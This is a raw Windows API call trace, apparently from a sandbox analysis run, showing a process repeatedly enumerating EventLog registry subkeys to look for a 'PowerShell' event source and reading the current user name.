	[0095.372] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x324) returned 0x0
	[0095.372] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.372] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x33c) returned 0x0
	[0095.372] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.372] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x340) returned 0x0
	[0095.373] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.373] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x344) returned 0x0
	[0095.373] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.373] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x348) returned 0x0
	[0095.373] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.373] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x34c) returned 0x0
	[0095.373] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x0) returned 0x2
	[0095.373] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x350) returned 0x0
	[0095.373] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6d8 | out: phkResult=0x16d6d8*=0x354) returned 0x0
	[0095.374] RegCloseKey (hKey=0x354) returned 0x0
	[0095.374] RegCloseKey (hKey=0x308) returned 0x0
	[0095.375] RegCloseKey (hKey=0x350) returned 0x0
	[0095.392] CoTaskMemAlloc (cb=0x804) returned 0x1b86a080
	[0095.392] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b86a080, nSize=0x16d8e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8e8) returned 0x1
	[0095.442] CoTaskMemFree (pv=0x1b86a080) 
	[0095.444] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.444] GetUserNameW (in: lpBuffer=0x29eb90, pcbBuffer=0x16d928 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d928) returned 1
	[0095.444] CoTaskMemFree (pv=0x29eb90) 
	[0095.570] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d628 | out: phkResult=0x16d628*=0x358) returned 0x0
	[0095.571] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.571] CoTaskMemFree (pv=0x0) 
	[0095.571] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.571] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.571] CoTaskMemFree (pv=0x29eb90) 
	[0095.572] CoTaskMemFree (pv=0x0) 
	[0095.572] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.572] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.572] CoTaskMemFree (pv=0x29eb90) 
	[0095.572] CoTaskMemFree (pv=0x0) 
	[0095.572] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.572] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.572] CoTaskMemFree (pv=0x29eb90) 
	[0095.572] CoTaskMemFree (pv=0x0) 
	[0095.572] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.572] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.572] CoTaskMemFree (pv=0x29eb90) 
	[0095.572] CoTaskMemFree (pv=0x0) 
	[0095.572] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x35c) returned 0x0
	[0095.572] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.572] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x360) returned 0x0
	[0095.572] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.572] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x364) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.573] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x368) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.573] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x36c) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.573] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x370) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.573] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x374) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.573] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x378) returned 0x0
	[0095.573] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.574] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x37c) returned 0x0
	[0095.574] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x380) returned 0x0
	[0095.574] RegCloseKey (hKey=0x380) returned 0x0
	[0095.574] RegCloseKey (hKey=0x358) returned 0x0
	[0095.574] RegCloseKey (hKey=0x37c) returned 0x0
	[0095.575] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d628 | out: phkResult=0x16d628*=0x37c) returned 0x0
	[0095.575] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d59c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d598, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d59c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d598*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.575] CoTaskMemFree (pv=0x0) 
	[0095.575] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.575] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.575] CoTaskMemFree (pv=0x29eb90) 
	[0095.575] CoTaskMemFree (pv=0x0) 
	[0095.575] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.575] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.576] CoTaskMemFree (pv=0x0) 
	[0095.576] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.576] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.576] CoTaskMemFree (pv=0x29eb90) 
	[0095.577] CoTaskMemFree (pv=0x0) 
	[0095.577] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.577] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x29eb90, lpcchName=0x16d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.577] CoTaskMemFree (pv=0x29eb90) 
	[0095.577] CoTaskMemFree (pv=0x0) 
	[0095.577] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x358) returned 0x0
	[0095.577] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.577] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x380) returned 0x0
	[0095.577] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.577] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x384) returned 0x0
	[0095.577] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.577] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x388) returned 0x0
	[0095.577] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.578] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x38c) returned 0x0
	[0095.578] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.578] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x390) returned 0x0
	[0095.578] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.578] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x394) returned 0x0
	[0095.578] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.578] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x398) returned 0x0
	[0095.578] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x0) returned 0x2
	[0095.578] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x39c) returned 0x0
	[0095.578] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d688 | out: phkResult=0x16d688*=0x3a0) returned 0x0
	[0095.579] RegCloseKey (hKey=0x3a0) returned 0x0
	[0095.579] RegCloseKey (hKey=0x37c) returned 0x0
	[0095.579] RegCloseKey (hKey=0x39c) returned 0x0
	[0095.580] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5f8 | out: phkResult=0x16d5f8*=0x39c) returned 0x0
	[0095.580] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.580] CoTaskMemFree (pv=0x0) 
	[0095.580] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.580] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.580] CoTaskMemFree (pv=0x29eb90) 
	[0095.580] CoTaskMemFree (pv=0x0) 
	[0095.580] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.580] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.581] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.581] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.581] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.581] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.581] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.581] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.581] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.581] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.581] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.581] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.581] CoTaskMemFree (pv=0x29eb90) 
	[0095.581] CoTaskMemFree (pv=0x0) 
	[0095.582] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.582] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.582] CoTaskMemFree (pv=0x29eb90) 
	[0095.582] CoTaskMemFree (pv=0x0) 
	[0095.582] CoTaskMemAlloc (cb=0x204) returned 0x29eb90
	[0095.582] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x29eb90, lpcchName=0x16d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0095.629] CoTaskMemFree (pv=0x29eb90) 
	[0095.629] CoTaskMemFree (pv=0x0) 
	[0095.629] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x37c) returned 0x0
	[0095.629] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.629] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3a0) returned 0x0
	[0095.629] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
	[0095.629] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x3a4) returned 0x0
	[0095.630] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d658 | out: phkResult=0x16d658*=0x0) returned 0x2
